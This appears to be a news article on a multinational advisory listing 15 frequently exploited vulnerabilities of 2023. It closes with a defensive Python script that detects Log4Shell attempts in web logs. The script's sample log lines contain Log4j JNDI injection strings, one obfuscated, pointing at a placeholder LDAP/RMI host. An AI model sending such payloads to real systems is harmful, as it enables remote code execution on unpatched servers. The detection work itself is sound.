Cyber security agencies from the USA, Canada, the UK, Australia and New Zealand have co-authored a joint Cyber Security Advisory, listing the top 15 most frequently exploited vulnerabilities in 2023.
"In 2023, malicious cyber actors exploited more zero-day vulnerabilities to compromise enterprise networks compared to 2022," stated the advisory. "Malicious cyber actors continue to have the most success exploiting vulnerabilities within two years after public disclosure of the vulnerability."
The advisory found that patching systems lessens the utility of vulnerabilities and that "international cybersecurity efforts" to reduce the lifespan of zero-day vulnerabilities thwarted the efforts of malicious cyber actors.
The advisory urges organisations around the world to patch these vulnerabilities immediately and to deploy patch management systems:
CVE-2023-3519: This vulnerability affects Citrix NetScaler ADC and NetScaler Gateway and allows an unauthenticated user to cause a stack buffer overflow in the NSPPE process by using an HTTP GET request.
CVE-2023-4966: This vulnerability affects Citrix NetScaler ADC and NetScaler Gateway and allows session token leakage; a proof-of-concept for this exploit was revealed in October 2023.
CVE-2023-20198: This vulnerability affects Cisco IOS XE Web UI and allows unauthorized users to gain initial access and issue a command to create a local user and password combination, resulting in the ability to log in with normal user access.
CVE-2023-20273: This vulnerability affects Cisco IOS XE and is used following activity from CVE-2023-20198. Once a local user has been created, it allows privilege escalation to root privileges.
CVE-2023-27997: This vulnerability affects Fortinet FortiOS and FortiProxy SSL-VPN and allows a remote user to craft specific requests to execute arbitrary code or commands.
CVE-2023-34362: This vulnerability affects Progress MOVEit Transfer and allows abuse of an SQL injection vulnerability to obtain a sysadmin API access token. Malicious cyber actors are able to obtain remote code execution via this access by abusing a deserialisation call.
CVE-2023-22515: This vulnerability affects Atlassian Confluence Data Center and Server and allows exploitation of an improper input validation issue. Arbitrary HTTP parameters can be translated into getter/setter sequences via the XWorks2 middleware and, in turn, allow Java objects to be modified at run time. The exploit creates a new administrator user and uploads a malicious plugin to get arbitrary code execution.
CVE-2021-44228: This vulnerability, known as Log4Shell, affects Apache's Log4j library, an open source logging framework incorporated into thousands of products worldwide. An actor can exploit it by submitting a specially crafted request to a vulnerable system, causing the execution of arbitrary code. The request allows a cyber actor to take full control of a system, then steal information, launch ransomware, or conduct other malicious activity. Malicious cyber actors began exploiting the vulnerability after it was publicly disclosed in December 2021.
CVE-2023-2868: This is a remote command injection vulnerability that affects the Barracuda Networks Email Security Gateway (ESG) Appliance and allows an individual to obtain unauthorized access and remotely execute system commands via the ESG appliance.
CVE-2022-47966: This is an unauthenticated remote code execution vulnerability that affects multiple products using Zoho ManageEngine and allows an unauthenticated user to execute arbitrary code by providing a crafted samlResponse XML to the ServiceDesk Plus SAML endpoint.
CVE-2023-27350: This vulnerability affects PaperCut MF/NG and allows a malicious cyber actor to chain an authentication bypass vulnerability with the abuse of built-in scripting functionality to execute code.
CVE-2020-1472: This vulnerability affects Microsoft Netlogon and allows privilege escalation. An unauthorised user may use non-default configurations to establish a vulnerable Netlogon secure channel connection to a domain controller by using the Netlogon Remote Protocol. Note: This CVE has been included in top routinely exploited vulnerabilities lists since 2021.
CVE-2023-42793: This vulnerability affects JetBrains TeamCity servers and allows an authentication bypass that leads to remote code execution against vulnerable servers.
CVE-2023-23397: This vulnerability affects Microsoft Office Outlook and allows elevation of privilege. A threat actor can send a specially crafted email that triggers automatically when the Outlook client processes it, so the exploit occurs without any user interaction.
CVE-2023-49103: This vulnerability affects ownCloud graphapi and allows unauthenticated information disclosure. An unauthenticated user can access sensitive data such as admin passwords, mail server credentials, and license keys.
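The Log4Shell entry above (CVE-2021-44228) describes a "specially crafted request", which in practice is a Log4j lookup string that reaches a logged field. As an added example that is not part of the advisory or of this article, the following Python script shows how a defender can detect such requests in web-server logs: it collapses nested Log4j lookups from the inside out (so simple case-changing and default-value nesting does not hide the literal "jndi") and reports the JNDI scheme found. The log lines, IP addresses and the lookup behaviour modelled in `_resolve` are constructed and simplified for illustration.

```python
import re
from typing import List, Tuple

# Constructed sample access-log lines (not from the advisory or any real incident).
SAMPLE_LOGS = [
    '10.0.0.5 - - [10/Dec/2021:10:00:01 +0000] "GET /index.html HTTP/1.1" 200 512 "-" "Mozilla/5.0"',
    '10.0.0.9 - - [10/Dec/2021:10:00:02 +0000] "GET / HTTP/1.1" 200 512 "-" "${jndi:ldap://203.0.113.10:1389/a}"',
    '10.0.0.7 - - [10/Dec/2021:10:00:03 +0000] "GET /login HTTP/1.1" 200 88 "-" "${${lower:j}ndi:${lower:rmi}://203.0.113.11/x}"',
    '10.0.0.8 - - [10/Dec/2021:10:00:04 +0000] "GET /search?q=${date:yyyy} HTTP/1.1" 200 88 "-" "curl/7.79"',
]

_INNER = re.compile(r"\$\{([^${}]*)\}")         # innermost ${...} lookup (no nesting inside)
_JNDI = re.compile(r"<JNDI:([a-z]+)://", re.I)   # sentinel emitted by _resolve for jndi lookups

def _resolve(body: str) -> str:
    """Approximate how Log4j 2 evaluates one innermost lookup (simplified model, assumption)."""
    name, _, value = body.partition(":")
    name = name.strip().lower()
    if name == "jndi":
        return f"<JNDI:{value}>"          # keep as a brace-free sentinel so it is not re-matched
    if name == "lower":
        return value.lower()
    if name == "upper":
        return value.upper()
    if ":-" in body:                      # default-value form, e.g. ${::-j} or ${env:NOPE:-j}
        return body.rsplit(":-", 1)[1]
    return value if value else name       # other lookups: keep the literal text for inspection

def normalize(text: str, max_rounds: int = 32) -> str:
    """Collapse nested lookups from the inside out until the text stops changing."""
    for _ in range(max_rounds):           # bounded so hostile input cannot loop forever
        new = _INNER.sub(lambda m: _resolve(m.group(1)), text)
        if new == text:
            break
        text = new
    return text

def scan(lines: List[str]) -> List[Tuple[int, str]]:
    """Return (line index, JNDI scheme) for each line carrying a JNDI lookup after normalization."""
    hits = []
    for i, line in enumerate(lines):
        m = _JNDI.search(normalize(line))
        if m:
            hits.append((i, m.group(1).lower()))
    return hits

if __name__ == "__main__":
    for idx, scheme in scan(SAMPLE_LOGS):
        print(f"line {idx}: JNDI lookup via {scheme}")
```

A hit is a reason to confirm the Log4j version on the receiving host and apply the vendor patch, not proof of compromise on its own; the benign `${date:yyyy}` line shows why the detector keys on the resolved "jndi" marker rather than on any `${` sequence.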